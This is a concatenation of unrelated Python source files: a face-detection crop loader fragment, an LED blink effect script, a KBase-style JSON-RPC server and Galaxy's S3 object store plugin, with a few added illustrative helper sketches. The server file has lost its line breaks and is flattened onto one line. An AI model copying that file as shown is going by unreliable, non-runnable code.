        self.data_name = ['data']
        #self.label_name = ['label', 'bbox_target', 'bbox_weight']
        self.label_name = []
        prefixes = ['face']
        if config.HEAD_BOX:
            prefixes.append('head')
        names = []
        for prefix in prefixes:
            names += [prefix+'_label', prefix+'_bbox_target', prefix+'_bbox_weight']
            if prefix=='face' and config.FACE_LANDMARK:
                names += [prefix+'_landmark_target', prefix+'_landmark_weight']
        #names = ['label', 'bbox_weight']
        for stride in self.feat_stride:
            for n in names:
                k = "%s_stride%d"%(n,stride)
                self.label_name.append(k)

        # status variable for synchronization between get_data and get_label
        self.cur = 0
        self.batch = None
        self.data = None
        self.label = None

        # get first batch to fill in provide_data and provide_label
        self.reset()
        self.q_in = [multiprocessing.Queue(1024) for i in range(config.NUM_CPU)]
        #self.q_in = multiprocessing.Queue(1024)
        self.q_out = multiprocessing.Queue(1024)
        self.start()
        self.get_batch()

    @property
    def provide_data(self):
        return [(k, v.shape) for k, v in zip(self.data_name, self.data)]

    @property
    def provide_label(self):
        return [(k, v.shape) for k, v in zip(self.label_name, self.label)]

    def reset(self):
        pass

    @staticmethod
    def input_worker(q_in, roidb, batch_size):
        index = np.arange(len(roidb))
        np.random.shuffle(index)
        cur_from = 0
        while True:
            cur_to = cur_from + batch_size
            if cur_to > len(roidb):
                np.random.shuffle(index)
                cur_from = 0
                continue
            _roidb = [roidb[index[i]] for i in range(cur_from, cur_to)]
            istart = index[cur_from]
            q_in[istart % len(q_in)].put(_roidb)
            cur_from = cur_to

    @staticmethod
    def gen_worker(q_in, q_out):
        while True:
            deq = q_in.get()
            if deq is None:
                break
            _roidb = deq
            data, label = get_crop_batch(_roidb)
            print('generated')
            q_out.put( (data, label) )

    def start(self):
        input_process = multiprocessing.Process(target=CropLoader2.input_worker, args=(self.q_in, self.roidb, self.batch_size))
        #gen_process = multiprocessing.Process(target=gen_worker, args=(q_in, q_out))
        gen_process = [multiprocessing.Process(target=CropLoader2.gen_worker, args=(self.q_in[i], self.q_out))
                       for i in range(config.NUM_CPU)]
        input_process.start()
        for p in gen_process:
            p.start()

    def next(self):
        self.get_batch()
        return mx.io.DataBatch(data=self.data, label=self.label,
                               provide_data=self.provide_data, provide_label=self.provide_label)

    def infer_shape(self, max_data_shape=None, max_label_shape=None):
        """ Return maximum data and label shape for single gpu """
        if max_data_shape is None:
            max_data_shape = []
        if max_label_shape is None:
            max_label_shape = []
        max_shapes = dict(max_data_shape + max_label_shape)
        input_batch_size = max_shapes['data'][0]
        dummy_boxes = np.zeros((0, 5))
        dummy_info = [ [max_shapes['data'][2], max_shapes['data'][3], 1.0] ]
        dummy_label = {'gt_boxes' : dummy_boxes}

        # infer shape
        feat_shape_list = []
        for i in range(len(self.feat_stride)):
            _, feat_shape, _ = self.feat_sym[i].infer_shape(**max_shapes)
            feat_shape = [int(i) for i in feat_shape[0]]
            feat_shape_list.append(feat_shape)

        label_dict = {}
        if config.HEAD_BOX:
            head_label_dict = assign_anchor_fpn(feat_shape_list, dummy_label, dummy_info, False, prefix='head')
            label_dict.update(head_label_dict)
        if config.FACE_LANDMARK:
            dummy_landmarks = np.zeros( (0,11) )
            dummy_label['gt_landmarks'] = dummy_landmarks
        face_label_dict = assign_anchor_fpn(feat_shape_list, dummy_label, dummy_info, config.FACE_LANDMARK, prefix='face')
        label_dict.update(face_label_dict)
        label_list = []
        for k in self.label_name:
            label_list.append(label_dict[k])
        label_shape = [(k, tuple([input_batch_size] + list(v.shape[1:]))) for k, v in zip(self.label_name, label_list)]
        return max_data_shape, label_shape

    def get_batch(self):
        deq = self.q_out.get()
        print('q_out got')
        data_list, label_list = deq
        for data, label in zip(data_list, label_list):
            data_shape = {k: v.shape for k, v in data.items()}
            del data_shape['im_info']
            feat_shape_list = []
            for s in range(len(self.feat_stride)):
                _, feat_shape, _ = self.feat_sym[s].infer_shape(**data_shape)
                feat_shape = [int(i) for i in feat_shape[0]]
                feat_shape_list.append(feat_shape)
            #for k in self.label_name:
            #    label[k] = [0 for i in range(config.TRAIN.BATCH_IMAGES)]
            im_info = data['im_info']
            gt_boxes = label['gt_boxes']
            gt_label = {'gt_boxes': gt_boxes}

            label_dict = {}
            head_label_dict = assign_anchor_fpn(feat_shape_list, gt_label, im_info, False, prefix='head')
            label_dict.update(head_label_dict)
            if config.FACE_LANDMARK:
                gt_landmarks = label['gt_landmarks']
                gt_label['gt_landmarks'] = gt_landmarks
            face_label_dict = assign_anchor_fpn(feat_shape_list, gt_label, im_info, config.FACE_LANDMARK, prefix='face')
            label_dict.update(face_label_dict)
            #print('im_info', im_info.shape)
            #print(gt_boxes.shape)

            for k in self.label_name:
                label[k] = label_dict[k]

        all_data = dict()
        for key in self.data_name:
            all_data[key] = tensor_vstack([batch[key] for batch in data_list])

        all_label = dict()
        for key in self.label_name:
            pad = 0 if key.startswith('bbox_') else -1
            #print('label vstack', key, pad, len(label_list), file=sys.stderr)
            all_label[key] = tensor_vstack([batch[key] for batch in label_list], pad=pad)

        self.data = [mx.nd.array(all_data[key]) for key in self.data_name]
        self.label = [mx.nd.array(all_label[key]) for key in self.label_name]
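
# Illustrative sketch: tensor_vstack is used above to merge per-image label
# arrays into one batch array, filling shorter arrays with a pad value so
# padded entries can be told apart from real targets. The helper below is a
# rough, self-contained numpy stand-in for that idea (not the actual
# rcnn.io.image implementation, whose details may differ).
import numpy as np

def padded_vstack(tensor_list, pad=0):
    # Pad every dimension after the first up to the largest size seen,
    # then concatenate along axis 0.
    max_tail = [max(t.shape[d] for t in tensor_list) for d in range(1, tensor_list[0].ndim)]
    padded = []
    for t in tensor_list:
        out = np.full((t.shape[0],) + tuple(max_tail), pad, dtype=t.dtype)
        out[tuple(slice(0, s) for s in t.shape)] = t
        padded.append(out)
    return np.concatenate(padded, axis=0)

# e.g. two per-image label rows of different widths, padded with -1:
# padded_vstack([np.zeros((1, 5)), np.zeros((1, 3))], pad=-1).shape == (2, 5)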
lyr_blink.py
#!/usr/bin/python

import pxlBuffer as pxb
import random
from time import sleep
import time


def blinkColor(q, led_count, layerNum, wait_ms=1, color="random", runtime=30):
    layer = pxb.pixelLayer(q, led_count, layerNum)

    if color == "random":
        rnd = True
    else:
        rnd = False

    endTime = time.time() + runtime
    while time.time() < endTime:
        if rnd:
            color = pxb.Color(random.randrange(0,256), random.randrange(0,256), random.randrange(0,256))
        layer[0:layer.size+1] = color; layer.show()
        sleep(random.randrange(1,300)/1000.0)
        #sleep(wait_ms/1000.0)
        layer[0:layer.size+1] = None; layer.show()
        sleep(random.randrange(1,1000)/1000.0)
        #sleep(wait_ms/1000.0)
        #sleep(wait_ms/1000.0)
    layer.die()


# entry function
def NeoFX(q, led_count, layerNum, *args):
    blinkColor(q, led_count, layerNum, *args)


# if we're testing the module, setup and execute
if __name__ == "__main__":
    from neopixel import *
    import multiprocessing
    import time
    from pprint import pprint

    # target FPS
    #TARGET_FPS = 1
    TARGET_FPS = 24

    # LED strip configuration:
    LED_COUNT = 632        # Number of LED pixels.
    LED_PIN = 18           # GPIO pin connected to the pixels (must support PWM!).
    LED_FREQ_HZ = 800000   # LED signal frequency in hertz (usually 800khz)
    LED_DMA = 5            # DMA channel to use for generating signal (try 5)
    LED_BRIGHTNESS = 128   # Set to 0 for darkest and 255 for brightest
    LED_INVERT = False     # True to invert the signal (when using NPN transistor level shift)

    q = multiprocessing.Queue()

    def masterThread(q):
        # Create NeoPixel object with appropriate configuration.
        strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
        # Initialize the library (must be called once before other functions).
        strip.begin()

        master = pxb.pixelMaster(strip, q)
        master.show()
        #pprint(master.layers)
        #pprint(master.ledsColorBuffer)

        startTime = time.time()
        iterTime = startTime
        count = 1
        targetSleep = 1/float(TARGET_FPS)
        print "target FPS: %s" % TARGET_FPS
        print "target runtime per frame: %s" % targetSleep
        updateFreq = TARGET_FPS*10  # every 10 seconds

        while master.die == False:
            iterTime = time.time()
            runTime = (time.time()-startTime)
            master.show()
            if count % updateFreq == 0:
                print "Time: %2.3f FPS: %2.3f" % (runTime, count/runTime)
                print master.layers
                startTime = time.time()
                count = 1
            else:
                count += 1
            sleepTime = targetSleep-(time.time()-iterTime)
            if sleepTime > 0:
                sleep(sleepTime)

    m = multiprocessing.Process(target=masterThread, args=(q,))
    m.daemon = True
    m.start()

    try:
        layer = 1
        while True:
            NeoFX(q, LED_COUNT, layer)
            layer += 1
    except KeyboardInterrupt:
        q.put("die")
        m.join()
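
# Illustrative sketch: the __main__ block above runs one effect after another
# in the main process. Because each effect only talks to the strip through the
# shared multiprocessing queue, several layers could also run concurrently,
# one process per layer. This launch_layers helper is hypothetical (not part
# of the original driver) and assumes the same pxlBuffer queue protocol and
# the NeoFX entry point defined above.
import multiprocessing

def launch_layers(q, led_count, num_layers, runtime=30):
    # One process per pixel layer; each runs the blink effect independently.
    procs = []
    for layer_num in range(1, num_layers + 1):
        p = multiprocessing.Process(target=NeoFX,
                                    args=(q, led_count, layer_num, 1, "random", runtime))
        p.daemon = True
        p.start()
        procs.append(p)
    for p in procs:
        p.join()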
ExampleServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- from wsgiref.simple_server import make_server import sys import json import traceback import datetime from multiprocessing import Process from getopt import getopt, GetoptError from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from os import environ from ConfigParser import ConfigParser from biokbase import log import requests as _requests import random as _random import os from Example.authclient import KBaseAuth as _KBaseAuth DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'Example'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from Example.ExampleImpl import Example # noqa @IgnorePep8 impl_Example = Example(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if isinstance(e.message, basestring): newerr.data = e.message else: # Some exceptions embed other exceptions as the message newerr.data = repr(e.message) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. 
""" rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8 self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. 
Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'Example' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_Example.filter_contigs, name='Example.filter_contigs', types=[dict]) self.method_authentication['Example.filter_contigs'] = 'required' # noqa self.rpc_service.add(impl_Example.status, name='Example.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'Example ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: 
try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception, e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print 'Request method was %s\n' % environ['REQUEST_METHOD'] # print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ) # print 'Request body was: %s' % request_body # print 'Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. 
# This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print "Monkeypatching std libraries for async" from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print "Listening on port %s" % port if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as 
err: # print help information and exit: print str(err) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print "Host set to %s" % host else: assert False, "unhandled option" start_server(host=host, port=port) # print "Listening on port %s" % port # httpd = make_server( host, port, application) # # httpd.serve_forever()
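
# Illustrative sketch: the WSGI handler above expects a JSON-RPC 1.1 style
# body with "method" ("<module>.<method>"), "params", "version" and "id", and
# reads the auth token from the Authorization header (required for
# Example.filter_contigs). A minimal client call against a locally started
# server could look like the following; the URL, id and params values are
# placeholders.
import json
import requests

def call_filter_contigs(params, token=None, url="http://localhost:9999"):
    body = {
        "method": "Example.filter_contigs",
        "params": [params],
        "version": "1.1",
        "id": "12345",
    }
    headers = {"Authorization": token} if token else {}
    resp = requests.post(url, data=json.dumps(body), headers=headers, timeout=60)
    rpc = resp.json()
    if "error" in rpc:
        raise RuntimeError(rpc["error"])
    return rpc["result"]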
s3.py
""" Object Store plugin for the Amazon Simple Storage Service (S3) """ import logging import multiprocessing import os import shutil import subprocess import threading import time from datetime import datetime try: # Imports are done this way to allow objectstore code to be used outside of Galaxy. import boto from boto.exception import S3ResponseError from boto.s3.connection import S3Connection from boto.s3.key import Key except ImportError: boto = None # type: ignore[assignment] from galaxy.exceptions import ( ObjectInvalid, ObjectNotFound, ) from galaxy.util import ( directory_hash_id, string_as_bool, umask_fix_perms, unlink, which, ) from galaxy.util.path import safe_relpath from galaxy.util.sleeper import Sleeper from .s3_multipart_upload import multipart_upload from ..objectstore import ( ConcreteObjectStore, convert_bytes, ) NO_BOTO_ERROR_MESSAGE = ( "S3/Swift object store configured, but no boto dependency available." "Please install and properly configure boto or modify object store configuration." ) log = logging.getLogger(__name__) logging.getLogger("boto").setLevel(logging.INFO) # Otherwise boto is quite noisy def parse_config_xml(config_xml): try: a_xml = config_xml.findall("auth")[0] access_key = a_xml.get("access_key") secret_key = a_xml.get("secret_key") b_xml = config_xml.findall("bucket")[0] bucket_name = b_xml.get("name") use_rr = string_as_bool(b_xml.get("use_reduced_redundancy", "False")) max_chunk_size = int(b_xml.get("max_chunk_size", 250)) cn_xml = config_xml.findall("connection") if not cn_xml: cn_xml = {} else: cn_xml = cn_xml[0] host = cn_xml.get("host", None) port = int(cn_xml.get("port", 6000)) multipart = string_as_bool(cn_xml.get("multipart", "True")) is_secure = string_as_bool(cn_xml.get("is_secure", "True")) conn_path = cn_xml.get("conn_path", "/") c_xml = config_xml.findall("cache")[0] cache_size = float(c_xml.get("size", -1)) staging_path = c_xml.get("path", None) tag, attrs = "extra_dir", ("type", "path") extra_dirs = config_xml.findall(tag) if not extra_dirs: msg = f"No {tag} element in XML tree" log.error(msg) raise Exception(msg) extra_dirs = [{k: e.get(k) for k in attrs} for e in extra_dirs] return { "auth": { "access_key": access_key, "secret_key": secret_key, }, "bucket": { "name": bucket_name, "use_reduced_redundancy": use_rr, "max_chunk_size": max_chunk_size, }, "connection": { "host": host, "port": port, "multipart": multipart, "is_secure": is_secure, "conn_path": conn_path, }, "cache": { "size": cache_size, "path": staging_path, }, "extra_dirs": extra_dirs, } except Exception: # Toss it back up after logging, we can't continue loading at this point. log.exception("Malformed ObjectStore Configuration XML -- unable to continue") raise class CloudConfigMixin: def _config_to_dict(self): return { "auth": { "access_key": self.access_key, "secret_key": self.secret_key, }, "bucket": { "name": self.bucket, "use_reduced_redundancy": self.use_rr, }, "connection": { "host": self.host, "port": self.port, "multipart": self.multipart, "is_secure": self.is_secure, "conn_path": self.conn_path, }, "cache": { "size": self.cache_size, "path": self.staging_path, }, "enable_cache_monitor": False, } class S3ObjectStore(ConcreteObjectStore, CloudConfigMixin): """ Object store that stores objects as items in an AWS S3 bucket. A local cache exists that is used as an intermediate location for files between Galaxy and S3. 
""" store_type = "s3" def __init__(self, config, config_dict): super().__init__(config, config_dict) self.transfer_progress = 0 auth_dict = config_dict["auth"] bucket_dict = config_dict["bucket"] connection_dict = config_dict.get("connection", {}) cache_dict = config_dict["cache"] self.enable_cache_monitor = config_dict.get("enable_cache_monitor", True) self.access_key = auth_dict.get("access_key") self.secret_key = auth_dict.get("secret_key") self.bucket = bucket_dict.get("name") self.use_rr = bucket_dict.get("use_reduced_redundancy", False) self.max_chunk_size = bucket_dict.get("max_chunk_size", 250) self.host = connection_dict.get("host", None) self.port = connection_dict.get("port", 6000) self.multipart = connection_dict.get("multipart", True) self.is_secure = connection_dict.get("is_secure", True) self.conn_path = connection_dict.get("conn_path", "/") self.cache_size = cache_dict.get("size", -1) self.staging_path = cache_dict.get("path") or self.config.object_store_cache_path extra_dirs = {e["type"]: e["path"] for e in config_dict.get("extra_dirs", [])} self.extra_dirs.update(extra_dirs) self._initialize() def _initialize(self): if boto is None: raise Exception(NO_BOTO_ERROR_MESSAGE) # for multipart upload self.s3server = { "access_key": self.access_key, "secret_key": self.secret_key, "is_secure": self.is_secure, "max_chunk_size": self.max_chunk_size, "host": self.host, "port": self.port, "use_rr": self.use_rr, "conn_path": self.conn_path, } self._configure_connection() self._bucket = self._get_bucket(self.bucket) self.start_cache_monitor() # Test if 'axel' is available for parallel download and pull the key into cache if which("axel"): self.use_axel = True else: self.use_axel = False def start_cache_monitor(self): # Clean cache only if value is set in galaxy.ini if self.cache_size != -1 and self.enable_cache_monitor: # Convert GBs to bytes for comparison self.cache_size = self.cache_size * 1073741824 # Helper for interruptable sleep self.sleeper = Sleeper() self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor) self.cache_monitor_thread.start() log.info("Cache cleaner manager started") def _configure_connection(self): log.debug("Configuring S3 Connection") # If access_key is empty use default credential chain if self.access_key: self.conn = S3Connection(self.access_key, self.secret_key) else: self.conn = S3Connection() @classmethod def parse_xml(clazz, config_xml): return parse_config_xml(config_xml) def to_dict(self): as_dict = super().to_dict() as_dict.update(self._config_to_dict()) return as_dict def __cache_monitor(self): time.sleep(2) # Wait for things to load before starting the monitor while self.running: total_size = 0 # Is this going to be too expensive of an operation to be done frequently? file_list = [] for dirpath, _, filenames in os.walk(self.staging_path): for filename in filenames: filepath = os.path.join(dirpath, filename) file_size = os.path.getsize(filepath) total_size += file_size # Get the time given file was last accessed last_access_time = time.localtime(os.stat(filepath)[7]) # Compose a tuple of the access time and the file path file_tuple = last_access_time, filepath, file_size file_list.append(file_tuple) # Sort the file list (based on access time) file_list.sort() # Initiate cleaning once within 10% of the defined cache size? 
cache_limit = self.cache_size * 0.9 if total_size > cache_limit: log.info( "Initiating cache cleaning: current cache size: %s; clean until smaller than: %s", convert_bytes(total_size), convert_bytes(cache_limit), ) # How much to delete? If simply deleting up to the cache-10% limit, # is likely to be deleting frequently and may run the risk of hitting # the limit - maybe delete additional #%? # For now, delete enough to leave at least 10% of the total cache free delete_this_much = total_size - cache_limit self.__clean_cache(file_list, delete_this_much) self.sleeper.sleep(30) # Test cache size every 30 seconds? def __clean_cache(self, file_list, delete_this_much): """Keep deleting files from the file_list until the size of the deleted files is greater than the value in delete_this_much parameter. :type file_list: list :param file_list: List of candidate files that can be deleted. This method will start deleting files from the beginning of the list so the list should be sorted accordingly. The list must contains 3-element tuples, positioned as follows: position 0 holds file last accessed timestamp (as time.struct_time), position 1 holds file path, and position 2 has file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394) :type delete_this_much: int :param delete_this_much: Total size of files, in bytes, that should be deleted. """ # Keep deleting datasets from file_list until deleted_amount does not # exceed delete_this_much; start deleting from the front of the file list, # which assumes the oldest files come first on the list. deleted_amount = 0 for entry in file_list: if deleted_amount < delete_this_much: deleted_amount += entry[2] os.remove(entry[1]) # Debugging code for printing deleted files' stats # folder, file_name = os.path.split(f[1]) # file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0]) # log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \ # % (i, file_name, convert_bytes(f[2]), file_date, \ # 